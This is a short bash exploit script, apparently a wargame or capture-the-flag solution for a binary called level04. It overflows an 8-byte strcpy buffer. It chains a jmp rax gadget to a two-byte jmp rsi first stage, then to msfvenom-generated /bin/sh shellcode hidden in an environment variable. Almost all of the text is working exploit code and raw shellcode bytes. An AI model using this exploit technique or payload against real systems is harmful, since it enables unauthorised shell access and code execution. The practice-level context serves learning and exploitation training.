Buffer overflow from a small amount of space, with some ROP and env shellcode

exploit.sh

#!/bin/bash
#  ASLR is on (stack, libs, vdso, etc)
#  execstack is on
#  .text segment is static, no pie
#
#  #include <string.h>
#
#  int dobug(char *arg) {
#    char buf[8];
#    strcpy(buf, arg);
#  }
#
#  int main(int argc, char *argv[]) {
#    return dobug(argv[1]);
#  }

#  Goes <dobug> -> <jmp rax gadget> -> <stage1: buffer with jmp rsi> -> <env: AA=[stage2: /bin/sh shellcode]>
cd /levels

#  Unset everything in the environment
unset `env | awk -F= '/^\w/ {print $1}' | xargs`

#  Set second stage /bin/sh shellcode into the only env var, this is located at rsi
#  msfvenom -b '\x00' -p linux/x64/exec CMD=/bin/sh -f c
export AA=`printf "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\x6f\x2d\xf1\x3a\x65\x82\xf8\xa9\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x05\x16\xa9\xa3\x2d\x39\xd7\xcb\x06\x43\xde\x49\x0d\x82\xab\xe1\xe6\xca\x99\x17\x06\x82\xf8\xe1\xe6\xcb\xa3\xd2\x6d\x82\xf8\xa9\x40\x4f\x98\x54\x4a\xf1\x90\xa9\x39\x7a\xb9\xb3\x83\x8d\xfd\xa9"`

#  Exploit the program, send first stage shellcode into the tiny buffer available, rax points to buf because of stcpy
#                  <jmp rsi>                                                                         <0x60043c to jmp rax gadget>
./level04 `printf "\xff\xe6\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x3c\x04\x60"`